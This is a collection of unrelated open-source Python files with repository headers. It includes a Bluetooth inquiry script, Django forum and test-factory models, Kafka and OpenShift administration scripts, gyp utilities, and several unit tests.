    bluez.hci_filter_set_event(flt, bluez.EVT_CMD_COMPLETE)
bluez.hci_filter_set_opcode(flt, opcode)
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, flt )
# first read the current inquiry mode.
bluez.hci_send_cmd(sock, bluez.OGF_HOST_CTL,
bluez.OCF_READ_INQUIRY_MODE )
pkt = sock.recv(255)
status,mode = struct.unpack("xxxxxxBB", pkt)
if status != 0: mode = -1
# restore old filter
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, old_filter )
return mode
def write_inquiry_mode(sock, mode):
"""returns 0 on success, -1 on failure"""
# save current filter
old_filter = sock.getsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, 14)
# Setup socket filter to receive only events related to the
# write_inquiry_mode command
flt = bluez.hci_filter_new()
opcode = bluez.cmd_opcode_pack(bluez.OGF_HOST_CTL,
bluez.OCF_WRITE_INQUIRY_MODE)
bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT)
    bluez.hci_filter_set_event(flt, bluez.EVT_CMD_COMPLETE)
bluez.hci_filter_set_opcode(flt, opcode)
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, flt )
# send the command!
bluez.hci_send_cmd(sock, bluez.OGF_HOST_CTL,
bluez.OCF_WRITE_INQUIRY_MODE, struct.pack("B", mode) )
pkt = sock.recv(255)
status = struct.unpack("xxxxxxB", pkt)[0]
# restore old filter
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, old_filter )
if status != 0: return -1
return 0
def device_inquiry_with_rssi(sock):
# save current filter
old_filter = sock.getsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, 14)
# perform a device inquiry on bluetooth device #0
    # The inquiry should last duration * 1.28 seconds (5.12 s with duration = 4 below)
# before the inquiry is performed, bluez should flush its cache of
# previously discovered devices
flt = bluez.hci_filter_new()
bluez.hci_filter_all_events(flt)
bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT)
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, flt )
duration = 4
max_responses = 255
cmd_pkt = struct.pack("BBBBB", 0x33, 0x8b, 0x9e, duration, max_responses)
bluez.hci_send_cmd(sock, bluez.OGF_LINK_CTL, bluez.OCF_INQUIRY, cmd_pkt)
results = []
done = False
while not done:
pkt = sock.recv(255)
ptype, event, plen = struct.unpack("BBB", pkt[:3])
if event == bluez.EVT_INQUIRY_RESULT_WITH_RSSI:
pkt = pkt[3:]
nrsp = struct.unpack("B", pkt[0])[0]
for i in range(nrsp):
addr = bluez.ba2str( pkt[1+6*i:1+6*i+6] )
rssi = struct.unpack("b", pkt[1+13*nrsp+i])[0]
results.append( ( addr, rssi ) )
print "[%s] RSSI: [%d]" % (addr, rssi)
elif event == bluez.EVT_INQUIRY_COMPLETE:
done = True
elif event == bluez.EVT_CMD_STATUS:
status, ncmd, opcode = struct.unpack("BBH", pkt[3:7])
if status != 0:
print "uh oh..."
printpacket(pkt[3:7])
done = True
elif event == bluez.EVT_INQUIRY_RESULT:
pkt = pkt[3:]
nrsp = struct.unpack("B", pkt[0])[0]
for i in range(nrsp):
addr = bluez.ba2str( pkt[1+6*i:1+6*i+6] )
results.append( ( addr, -1 ) )
print "[%s] (no RRSI)" % addr
else:
print "unrecognized packet type 0x%02x" % ptype
print "event ", event
# restore old filter
sock.setsockopt( bluez.SOL_HCI, bluez.HCI_FILTER, old_filter )
return results
dev_id = 0
try:
sock = bluez.hci_open_dev(dev_id)
except:
print "error accessing bluetooth device..."
sys.exit(1)
try:
mode = read_inquiry_mode(sock)
except Exception, e:
print "error reading inquiry mode. "
print "Are you sure this a bluetooth 1.2 device?"
print e
sys.exit(1)
print "current inquiry mode is %d" % mode
if mode != 1:
print "writing inquiry mode..."
try:
result = write_inquiry_mode(sock, 1)
except Exception, e:
print "error writing inquiry mode. Are you sure you're root?"
print e
sys.exit(1)
if result != 0:
print "error while setting inquiry mode"
print "result: %d" % result
device_inquiry_with_rssi(sock)
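# Note: opening a raw HCI socket and switching the inquiry mode normally
# requires root privileges; each response is printed by the inquiry loop
# above as "[<addr>] RSSI: [<n>]".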
|
NEERAJIITKGP/pybbm
|
refs/heads/master
|
pybb/profiles.py
|
11
|
# coding=utf-8
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.utils.translation import ugettext_lazy as _
from pybb import defaults, util
from pybb.compat import get_image_field_class, get_username_field
TZ_CHOICES = [(float(x[0]), x[1]) for x in (
(-12, '-12'), (-11, '-11'), (-10, '-10'), (-9.5, '-09.5'), (-9, '-09'),
(-8.5, '-08.5'), (-8, '-08 PST'), (-7, '-07 MST'), (-6, '-06 CST'),
(-5, '-05 EST'), (-4, '-04 AST'), (-3.5, '-03.5'), (-3, '-03 ADT'),
(-2, '-02'), (-1, '-01'), (0, '00 GMT'), (1, '+01 CET'), (2, '+02'),
(3, '+03'), (3.5, '+03.5'), (4, '+04'), (4.5, '+04.5'), (5, '+05'),
(5.5, '+05.5'), (6, '+06'), (6.5, '+06.5'), (7, '+07'), (8, '+08'),
(9, '+09'), (9.5, '+09.5'), (10, '+10'), (10.5, '+10.5'), (11, '+11'),
(11.5, '+11.5'), (12, '+12'), (13, '+13'), (14, '+14'),
)]
class PybbProfile(models.Model):
"""
    Abstract class for user profile; site profiles should inherit from this class
"""
class Meta(object):
abstract = True
permissions = (
("block_users", "Can block any user"),
)
signature = models.TextField(_('Signature'), blank=True, max_length=defaults.PYBB_SIGNATURE_MAX_LENGTH)
signature_html = models.TextField(_('Signature HTML Version'), blank=True,
max_length=defaults.PYBB_SIGNATURE_MAX_LENGTH + 30)
time_zone = models.FloatField(_('Time zone'), choices=TZ_CHOICES, default=float(defaults.PYBB_DEFAULT_TIME_ZONE))
language = models.CharField(_('Language'), max_length=10, blank=True, choices=settings.LANGUAGES,
default=settings.LANGUAGE_CODE)
show_signatures = models.BooleanField(_('Show signatures'), blank=True, default=True)
post_count = models.IntegerField(_('Post count'), blank=True, default=0)
avatar = get_image_field_class()(_('Avatar'), blank=True, null=True,
upload_to=util.FilePathGenerator(to='pybb/avatar'))
autosubscribe = models.BooleanField(_('Automatically subscribe'),
help_text=_('Automatically subscribe to topics that you answer'),
default=defaults.PYBB_DEFAULT_AUTOSUBSCRIBE)
def save(self, *args, **kwargs):
self.signature_html = util._get_markup_formatter()(self.signature)
super(PybbProfile, self).save(*args, **kwargs)
@property
def avatar_url(self):
try:
return self.avatar.url
except:
return defaults.PYBB_DEFAULT_AVATAR_URL
def get_display_name(self):
try:
if hasattr(self, 'user'): # we have OneToOne foreign key to user model
return self.user.get_username()
if not defaults.PYBB_PROFILE_RELATED_NAME: # we now in user custom model itself
return self.get_username()
except Exception:
return unicode(self)
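# A concrete site profile is expected to subclass the abstract model above,
# e.g. (illustrative sketch, not part of pybb itself):
#
#     class ForumProfile(PybbProfile):
#         user = models.OneToOneField(settings.AUTH_USER_MODEL,
#                                     related_name='pybb_profile')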
|
tktrungna/leetcode
|
refs/heads/master
|
Python/reverse-linked-list.py
|
1
|
"""
QUESTION:
Reverse a singly linked list.
Hint:
A linked list can be reversed either iteratively or recursively. Could you implement both?
"""
# Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
# @param {ListNode} head
# @return {ListNode}
def reverseList(self, head):
tail = None
while head:
tmp = head.next
head.next = tail
tail = head
head = tmp
return tail
def reverseList_2(self, head):
def dfs(head,newHead):
if not head:
return newHead
next = head.next
head.next = newHead
return dfs(next,head)
return dfs(head, None)
if __name__ == '__main__':
print
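    # Quick sanity check (illustrative addition): reverse 1 -> 2 -> 3
    # iteratively, then recursively; two reversals restore the original order.
    head = ListNode(1)
    head.next = ListNode(2)
    head.next.next = ListNode(3)
    head = Solution().reverseList(head)      # 3 -> 2 -> 1
    head = Solution().reverseList_2(head)    # back to 1 -> 2 -> 3
    vals = []
    while head:
        vals.append(head.val)
        head = head.next
    print vals  # expected: [1, 2, 3]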
|
arenadata/ambari
|
refs/heads/branch-adh-1.6
|
ambari-server/src/main/resources/stacks/ADH/1.5/services/KAFKA/package/scripts/service_check.py
|
1
|
#!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from resource_management.libraries.script.script import Script
from resource_management.libraries.functions.validate import call_and_match_output
from resource_management.libraries.functions.format import format
from resource_management.core.logger import Logger
from resource_management.core import sudo
import subprocess
class ServiceCheck(Script):
def service_check(self, env):
import params
env.set_params(params)
# TODO, Kafka Service check should be more robust , It should get all the broker_hosts
# Produce some messages and check if consumer reads same no.of messages.
kafka_config = self.read_kafka_config()
topic = "ambari_kafka_service_check"
create_topic_cmd_created_output = "Created topic \"ambari_kafka_service_check\"."
create_topic_cmd_exists_output = "Topic \"ambari_kafka_service_check\" already exists."
source_cmd = format("source {conf_dir}/kafka-env.sh")
topic_exists_cmd = format("{kafka_home}/bin/kafka-topics.sh --zookeeper {kafka_config[zookeeper.connect]} --topic {topic} --list")
topic_exists_cmd_p = subprocess.Popen(topic_exists_cmd.split(" "), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
topic_exists_cmd_out, topic_exists_cmd_err = topic_exists_cmd_p.communicate()
    # run create topic command only if the topic doesn't exist
if params.kerberos_security_enabled and params.kafka_kerberos_enabled and topic not in topic_exists_cmd_out:
create_topic_cmd = format("{kafka_home}/bin/kafka-topics.sh --zookeeper {kafka_config[zookeeper.connect]} --create --topic {topic} --partitions 1 --replication-factor 1")
command = 'export JAVA_HOME='+ params.java64_home +' KAFKA_OPTS="-Djava.security.auth.login.config=/etc/kafka/conf/kafka_jaas.conf"' + ' ; ' + create_topic_cmd
Logger.info("Running kafka create topic command: %s" % command)
call_and_match_output(command, format("({create_topic_cmd_created_output})|({create_topic_cmd_exists_output})"), "Failed to check that topic exists", user=params.kafka_user)
else:
if topic not in topic_exists_cmd_out:
create_topic_cmd = format("{kafka_home}/bin/kafka-topics.sh --zookeeper {kafka_config[zookeeper.connect]} --create --topic {topic} --partitions 1 --replication-factor 1")
command = 'export JAVA_HOME='+ params.java64_home + ' ; ' + create_topic_cmd
Logger.info("Running kafka create topic command: %s" % command)
call_and_match_output(command, format("({create_topic_cmd_created_output})|({create_topic_cmd_exists_output})"), "Failed to check that topic exists", user=params.kafka_user)
def read_kafka_config(self):
import params
kafka_config = {}
content = sudo.read_file(params.conf_dir + "/server.properties")
for line in content.splitlines():
if line.startswith("#") or not line.strip():
continue
key, value = line.split("=")
kafka_config[key] = value.replace("\n", "")
return kafka_config
if __name__ == "__main__":
ServiceCheck().execute()
|
FNNDSC/openshiftmgr
|
refs/heads/master
|
openshiftmgr.py
|
1
|
"""
OpenShift cluster manager module that provides functionality to schedule jobs as well as
manage their state in the cluster.
"""
from argparse import ArgumentParser
import yaml
import json
import configparser
import os
from kubernetes import client
from openshift import client as o_client
from openshift import config
class OpenShiftManager(object):
def __init__(self):
        parser = ArgumentParser(description='Manage an OpenShift cluster')
group = parser.add_mutually_exclusive_group()
group.add_argument("-s", "--schedule", help="schedule a new job",
metavar='name')
group.add_argument("-r", "--remove", help="remove a previously scheduled job",
metavar='name')
group.add_argument("--state", help="print state of scheduled job",
metavar='name')
parser.add_argument("--conffile", help="OpenShift cluster configuration file")
parser.add_argument("-p", "--project", help="The OpenShift project to create jobs in. Project can also be specified with openshiftmgr.ini or the OPENSHIFTMGR_PROJECT environment variable.")
parser.add_argument("-i", "--image",
help="docker image for the scheduled job container")
parser.add_argument("-c", "--command",
help="command to be run inside scheduled job container")
parser.add_argument("-m", "--mount", help="mount directory in the cluster",
metavar='dir')
self.parser = parser
self.openshift_client = None
self.kube_client = None
self.kube_v1_batch_client = None
def init_openshift_client(self, conf_filepath=None):
"""
        Method to get an OpenShift client connected to remote or local OpenShift.
"""
if conf_filepath is None:
config.load_kube_config()
else:
config.load_kube_config(config_file=conf_filepath)
self.openshift_client = o_client.OapiApi()
self.kube_client = client.CoreV1Api()
self.kube_v1_batch_client = client.BatchV1Api()
def schedule(self, image, command, name, project, mountdir=None):
"""
Schedule a new job and returns the job object.
"""
job_str = """
apiVersion: batch/v1
kind: Job
metadata:
name: {name}
spec:
parallelism: 1
completions: 1
activeDeadlineSeconds: 3600
template:
metadata:
name: {name}
spec:
restartPolicy: Never
containers:
- name: {name}
image: {image}
command: {command}
""".format(name=name, command=str(command.split(" ")), image=image)
if mountdir is not None:
job_str = job_str + """
volumeMounts:
- mountPath: /share
name: openshiftmgr-storage
volumes:
- name: openshiftmgr-storage
hostPath:
path: {mountdir}
""".format(mountdir=mountdir)
        job_yaml = yaml.safe_load(job_str)  # safe_load suffices for this plain job spec
job = self.kube_v1_batch_client.create_namespaced_job(namespace=project, body=job_yaml)
print(yaml.dump(job))
return job
def get_job(self, name, project):
"""
Get the previously scheduled job object.
"""
return self.kube_v1_batch_client.read_namespaced_job(name, project)
def remove(self, name, project):
"""
Remove a previously scheduled job.
"""
self.kube_v1_batch_client.delete_namespaced_job(name, project, {})
def parse(self, args=None):
"""
Parse the arguments passed to the manager and perform the appropriate action.
"""
# parse argument options
options = self.parser.parse_args(args)
config = configparser.ConfigParser()
config.read('openshiftmgr.ini')
        project = (options.project or os.environ.get('OPENSHIFTMGR_PROJECT')
                   or config['DEFAULT'].get('OPENSHIFTMGR_PROJECT'))
if not project:
self.parser.error("-p/--project is required")
# init the openshift client
if options.conffile:
self.init_openshift_client(options.conffile)
else:
self.init_openshift_client()
if options.schedule:
if not (options.image and options.command):
self.parser.error("-s/--schedule requires -i/--image and -c/--command")
self.schedule(options.image, options.command, options.schedule,
project, options.mount)
if options.remove:
self.remove(options.remove, project)
if options.state:
job = self.get_job(options.state, project)
message = None
state = None
reason = None
if job.status.conditions:
for condition in job.status.conditions:
if condition.type == 'Failed' and condition.status == 'True':
message = 'started'
reason = condition.reason
state = 'failed'
break
if not state:
if job.status.completion_time and job.status.succeeded > 0:
message = 'finished'
state = 'complete'
elif job.status.active > 0:
message = 'started'
state = 'running'
else:
message = 'inactive'
state = 'inactive'
ret_dict = {'Status': {'Message': message,
'State': state,
'Reason': reason,
'Active': job.status.active,
'Failed': job.status.failed,
'Succeeded': job.status.succeeded,
'StartTime': job.status.start_time,
'CompletionTime': job.status.completion_time}}
print(json.dumps(ret_dict))
# ENTRYPOINT
if __name__ == "__main__":
manager = OpenShiftManager()
manager.parse()
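# Example invocations (illustrative; project, image and job names are
# placeholders):
#   python openshiftmgr.py -s myjob -i alpine -c "echo hello" -p myproject
#   python openshiftmgr.py --state myjob -p myproject
#   python openshiftmgr.py -r myjob -p myproject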
|
codevlabs/grab
|
refs/heads/master
|
test/grab_get_request.py
|
11
|
# coding: utf-8
from test.util import build_grab
from test.util import BaseGrabTestCase
class GrabSimpleTestCase(BaseGrabTestCase):
def setUp(self):
self.server.reset()
def test_get(self):
self.server.response['get.data'] = 'Final Countdown'
g = build_grab()
g.go(self.server.get_url())
self.assertTrue(b'Final Countdown' in g.response.body)
def test_body_content(self):
self.server.response['get.data'] = 'Simple String'
g = build_grab()
g.go(self.server.get_url())
self.assertEqual(b'Simple String', g.response.body)
# self.assertEqual('Simple String' in g.response.runtime_body)
def test_status_code(self):
self.server.response['get.data'] = 'Simple String'
g = build_grab()
g.go(self.server.get_url())
self.assertEqual(200, g.response.code)
def test_parsing_response_headers(self):
self.server.response['headers'] = [('Hello', 'Grab')]
g = build_grab()
g.go(self.server.get_url())
self.assertTrue(g.response.headers['Hello'] == 'Grab')
    def test_deprecated_hammer_mode_options(self):
self.server.response['get.data'] = 'foo'
g = build_grab()
g.setup(hammer_mode=True)
g.go(self.server.get_url())
g.setup(hammer_timeouts=((1, 1), (2, 2)))
g.go(self.server.get_url())
|
lyw07/kolibri
|
refs/heads/develop
|
kolibri/plugins/setup_wizard/kolibri_plugin.py
|
1
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from . import hooks
from kolibri.core.device.hooks import SetupHook
from kolibri.core.webpack import hooks as webpack_hooks
from kolibri.plugins.base import KolibriPluginBase
class SetupWizardPlugin(KolibriPluginBase):
def url_slug(self):
return "^setup_wizard/"
class SetupWizardAsset(webpack_hooks.WebpackBundleHook):
unique_slug = "setup_wizard"
src_file = "assets/src/app.js"
class SetupWizardInclusionHook(hooks.SetupWizardSyncHook):
bundle_class = SetupWizardAsset
class SetupWizardHook(SetupHook):
@property
def url(self):
return self.plugin_url(SetupWizardPlugin, "setupwizard")
|
prakashwaghwani/rails-vs-mean-stack
|
refs/heads/gh-pages
|
node_modules/node-gyp/gyp/pylib/gyp/common_test.py
|
2542
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for the common.py file."""
import gyp.common
import unittest
import sys
class TestTopologicallySorted(unittest.TestCase):
def test_Valid(self):
"""Test that sorting works on a valid graph with one possible order."""
graph = {
'a': ['b', 'c'],
'b': [],
'c': ['d'],
'd': ['b'],
}
def GetEdge(node):
return tuple(graph[node])
self.assertEqual(
gyp.common.TopologicallySorted(graph.keys(), GetEdge),
['a', 'c', 'd', 'b'])
def test_Cycle(self):
"""Test that an exception is thrown on a cyclic graph."""
graph = {
'a': ['b'],
'b': ['c'],
'c': ['d'],
'd': ['a'],
}
def GetEdge(node):
return tuple(graph[node])
self.assertRaises(
gyp.common.CycleError, gyp.common.TopologicallySorted,
graph.keys(), GetEdge)
class TestGetFlavor(unittest.TestCase):
"""Test that gyp.common.GetFlavor works as intended"""
original_platform = ''
def setUp(self):
self.original_platform = sys.platform
def tearDown(self):
sys.platform = self.original_platform
def assertFlavor(self, expected, argument, param):
sys.platform = argument
self.assertEqual(expected, gyp.common.GetFlavor(param))
def test_platform_default(self):
self.assertFlavor('freebsd', 'freebsd9' , {})
self.assertFlavor('freebsd', 'freebsd10', {})
self.assertFlavor('openbsd', 'openbsd5' , {})
    self.assertFlavor('solaris', 'sunos5' , {})
    self.assertFlavor('solaris', 'sunos' , {})
    self.assertFlavor('linux' , 'linux2' , {})
    self.assertFlavor('linux' , 'linux3' , {})
def test_param(self):
self.assertFlavor('foobar', 'linux2' , {'flavor': 'foobar'})
if __name__ == '__main__':
unittest.main()
|
tomasjames/citsciportal
|
refs/heads/master
|
app/agentex/tests/factories.py
|
2
|
import factory
import factory.django
import agentex.models as models
import datetime
import random
'''
This file contains all of the factories used to emulate/override the
models found in models.py for testing purposes.
'''
class EventFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Event
    # The Meta class is essential: it tells factory_boy which model each
    # factory should generate.
    # The attributes below supply replacement values for the fields of the
    # corresponding models.
name = 'trenzalore'
finder = long(random.randint(0,500))
class DataSourceFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.DataSource
id = long(random.randint(0,50))
timestamp = datetime.datetime.now
# factory.SubFactory is the equivalent of a ForeignKey and allows the
# individual factories to link to one another much in the way that
# ForeignKey allows
event = factory.SubFactory(EventFactory)
class CatSourceFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CatSource
id = random.randint(0,50)
name = 'Raxacoricofallapatorius'
data = factory.SubFactory(DataSourceFactory)
class DatapointFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Datapoint
data = factory.SubFactory(DataSourceFactory)
source = factory.SubFactory(CatSourceFactory)
class DecisionFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Decision
source = factory.SubFactory(CatSourceFactory)
planet = factory.SubFactory(EventFactory)
value = float(random.randint(0,500))
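# Example usage (illustrative): instantiating a factory in a test builds the
# model instance together with its SubFactory relations, e.g.
#
#     decision = DecisionFactory()
#     assert decision.planet.name == 'trenzalore'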
|
eadgarchen/tensorflow
|
refs/heads/master
|
tensorflow/python/training/server_lib_same_variables_clear_test.py
|
133
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.GrpcServer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.client import session
from tensorflow.python.framework import errors_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import server_lib
class SameVariablesClearTest(test.TestCase):
# Verifies behavior of tf.Session.reset().
# TODO(b/34465411): Starting multiple servers with different configurations
# in the same test is flaky. Move this test case back into
# "server_lib_test.py" when this is no longer the case.
def testSameVariablesClear(self):
server = server_lib.Server.create_local_server()
# Creates a graph with 2 variables.
v0 = variables.Variable([[2, 1]], name="v0")
v1 = variables.Variable([[1], [2]], name="v1")
v2 = math_ops.matmul(v0, v1)
# Verifies that both sessions connecting to the same target return
# the same results.
sess_1 = session.Session(server.target)
sess_2 = session.Session(server.target)
sess_1.run(variables.global_variables_initializer())
self.assertAllEqual([[4]], sess_1.run(v2))
self.assertAllEqual([[4]], sess_2.run(v2))
# Resets target. sessions abort. Use sess_2 to verify.
session.Session.reset(server.target)
with self.assertRaises(errors_impl.AbortedError):
self.assertAllEqual([[4]], sess_2.run(v2))
# Connects to the same target. Device memory for the variables would have
# been released, so they will be uninitialized.
sess_2 = session.Session(server.target)
with self.assertRaises(errors_impl.FailedPreconditionError):
sess_2.run(v2)
# Reinitializes the variables.
sess_2.run(variables.global_variables_initializer())
self.assertAllEqual([[4]], sess_2.run(v2))
sess_2.close()
if __name__ == "__main__":
test.main()
|
miguelparaiso/OdooAccessible
|
refs/heads/master
|
openerp/addons/test_exceptions/__openerp__.py
|
435
|
# -*- coding: utf-8 -*-
{
'name': 'test-exceptions',
'version': '0.1',
'category': 'Tests',
'description': """A module to generate exceptions.""",
'author': 'OpenERP SA',
'maintainer': 'OpenERP SA',
'website': 'http://www.openerp.com',
'depends': ['base'],
'data': ['view.xml', 'ir.model.access.csv'],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
blindpenguin/blackboard
|
refs/heads/master
|
node_modules/gulp-sass/node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/MSVSUserFile.py
|
2710
|
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Visual Studio user preferences file writer."""
import os
import re
import socket # for gethostname
import gyp.common
import gyp.easy_xml as easy_xml
#------------------------------------------------------------------------------
def _FindCommandInPath(command):
"""If there are no slashes in the command given, this function
searches the PATH env to find the given command, and converts it
to an absolute path. We have to do this because MSVS is looking
for an actual file to launch a debugger on, not just a command
line. Note that this happens at GYP time, so anything needing to
be built needs to have a full path."""
if '/' in command or '\\' in command:
# If the command already has path elements (either relative or
# absolute), then assume it is constructed properly.
return command
else:
# Search through the path list and find an existing file that
# we can access.
paths = os.environ.get('PATH','').split(os.pathsep)
for path in paths:
item = os.path.join(path, command)
if os.path.isfile(item) and os.access(item, os.X_OK):
return item
return command
def _QuoteWin32CommandLineArgs(args):
new_args = []
for arg in args:
# Replace all double-quotes with double-double-quotes to escape
# them for cmd shell, and then quote the whole thing if there
# are any.
if arg.find('"') != -1:
arg = '""'.join(arg.split('"'))
arg = '"%s"' % arg
# Otherwise, if there are any spaces, quote the whole arg.
elif re.search(r'[ \t\n]', arg):
arg = '"%s"' % arg
new_args.append(arg)
return new_args
class Writer(object):
"""Visual Studio XML user user file writer."""
def __init__(self, user_file_path, version, name):
"""Initializes the user file.
Args:
user_file_path: Path to the user file.
version: Version info.
name: Name of the user file.
"""
self.user_file_path = user_file_path
self.version = version
self.name = name
self.configurations = {}
def AddConfig(self, name):
"""Adds a configuration to the project.
Args:
name: Configuration name.
"""
self.configurations[name] = ['Configuration', {'Name': name}]
def AddDebugSettings(self, config_name, command, environment = {},
working_directory=""):
"""Adds a DebugSettings node to the user file for a particular config.
Args:
command: command line to run. First element in the list is the
executable. All elements of the command will be quoted if
necessary.
      environment: dict of environment variables to set. (optional)
      working_directory: directory in which to run the command. (optional)
"""
command = _QuoteWin32CommandLineArgs(command)
abs_command = _FindCommandInPath(command[0])
if environment and isinstance(environment, dict):
env_list = ['%s="%s"' % (key, val)
for (key,val) in environment.iteritems()]
environment = ' '.join(env_list)
else:
environment = ''
n_cmd = ['DebugSettings',
{'Command': abs_command,
'WorkingDirectory': working_directory,
'CommandArguments': " ".join(command[1:]),
'RemoteMachine': socket.gethostname(),
'Environment': environment,
'EnvironmentMerge': 'true',
# Currently these are all "dummy" values that we're just setting
# in the default manner that MSVS does it. We could use some of
# these to add additional capabilities, I suppose, but they might
# not have parity with other platforms then.
'Attach': 'false',
'DebuggerType': '3', # 'auto' debugger
'Remote': '1',
'RemoteCommand': '',
'HttpUrl': '',
'PDBPath': '',
'SQLDebugging': '',
'DebuggerFlavor': '0',
'MPIRunCommand': '',
'MPIRunArguments': '',
'MPIRunWorkingDirectory': '',
'ApplicationCommand': '',
'ApplicationArguments': '',
'ShimCommand': '',
'MPIAcceptMode': '',
'MPIAcceptFilter': ''
}]
# Find the config, and add it if it doesn't exist.
if config_name not in self.configurations:
self.AddConfig(config_name)
# Add the DebugSettings onto the appropriate config.
self.configurations[config_name].append(n_cmd)
def WriteIfChanged(self):
"""Writes the user file."""
configs = ['Configurations']
for config, spec in sorted(self.configurations.iteritems()):
configs.append(spec)
content = ['VisualStudioUserFile',
{'Version': self.version.ProjectVersion(),
'Name': self.name
},
configs]
easy_xml.WriteXmlIfChanged(content, self.user_file_path,
encoding="Windows-1252")
|
jrichte43/ProjectEuler
|
refs/heads/develop
|
Problem-0440/solutions.py
|
1
|
__problem_title__ = "GCD and Tiling"
__problem_url___ = "https://projecteuler.net/problem=440"
__problem_description__ = "We want to tile a board of length and height 1 completely, with " \
"either 1 × 2 blocks or 1 × 1 blocks with a single decimal digit on " \
"top: For example, here are some of the ways to tile a board of length " \
"= 8: Let T( ) be the number of ways to tile a board of length as " \
"described above. For example, T(1) = 10 and T(2) = 101. Let S( ) be " \
"the triple sum ∑ gcd(T( ), T( )) for 1 ≤ , , ≤ . For example: S(2) = " \
"10444 S(3) = 1292115238446807016106539989 S(4) mod 987 898 789 = " \
"670616280. Find S(2000) mod 987 898 789."
import timeit
class Solution():
@staticmethod
def solution1():
pass
@staticmethod
def time_solutions():
setup = 'from __main__ import Solution'
print('Solution 1:', timeit.timeit('Solution.solution1()', setup=setup, number=1))
if __name__ == '__main__':
s = Solution()
print(s.solution1())
s.time_solutions()
|
rayrrr/luigi
|
refs/heads/master
|
test/contrib/gcs_test.py
|
9
|
# -*- coding: utf-8 -*-
#
# Copyright 2015 Twitter Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""This is an integration test for the GCS-luigi binding.
This test requires credentials that can access GCS & access to a bucket below.
Follow the directions in the gcloud tools to set up local credentials.
"""
from helpers import unittest
try:
import googleapiclient.errors
import google.auth
except ImportError:
raise unittest.SkipTest('Unable to load googleapiclient module')
import os
import tempfile
import unittest
from luigi.contrib import gcs
from target_test import FileSystemTargetTestMixin
from nose.plugins.attrib import attr
# In order to run this test, you should set these to your GCS project/bucket.
# Unfortunately there's no mock
PROJECT_ID = os.environ.get('GCS_TEST_PROJECT_ID', 'your_project_id_here')
BUCKET_NAME = os.environ.get('GCS_TEST_BUCKET', 'your_test_bucket_here')
TEST_FOLDER = os.environ.get('TRAVIS_BUILD_ID', 'gcs_test_folder')
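# For a local run, point these at a project and bucket you control, e.g.
# (values are placeholders):
#   export GCS_TEST_PROJECT_ID=my-project GCS_TEST_BUCKET=my-test-bucket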
CREDENTIALS, _ = google.auth.default()
ATTEMPTED_BUCKET_CREATE = False
def bucket_url(suffix):
"""
    Returns a gs:// URL built from the bucket, the test folder and the given suffix.
"""
return 'gs://{}/{}/{}'.format(BUCKET_NAME, TEST_FOLDER, suffix)
class _GCSBaseTestCase(unittest.TestCase):
def setUp(self):
self.client = gcs.GCSClient(CREDENTIALS)
global ATTEMPTED_BUCKET_CREATE
if not ATTEMPTED_BUCKET_CREATE:
try:
self.client.client.buckets().insert(
project=PROJECT_ID, body={'name': BUCKET_NAME}).execute()
except googleapiclient.errors.HttpError as ex:
if ex.resp.status != 409: # bucket already exists
raise
ATTEMPTED_BUCKET_CREATE = True
self.client.remove(bucket_url(''), recursive=True)
self.client.mkdir(bucket_url(''))
def tearDown(self):
self.client.remove(bucket_url(''), recursive=True)
@attr('gcloud')
class GCSClientTest(_GCSBaseTestCase):
def test_not_exists(self):
self.assertFalse(self.client.exists(bucket_url('does_not_exist')))
self.assertFalse(self.client.isdir(bucket_url('does_not_exist')))
def test_exists(self):
self.client.put_string('hello', bucket_url('exists_test'))
self.assertTrue(self.client.exists(bucket_url('exists_test')))
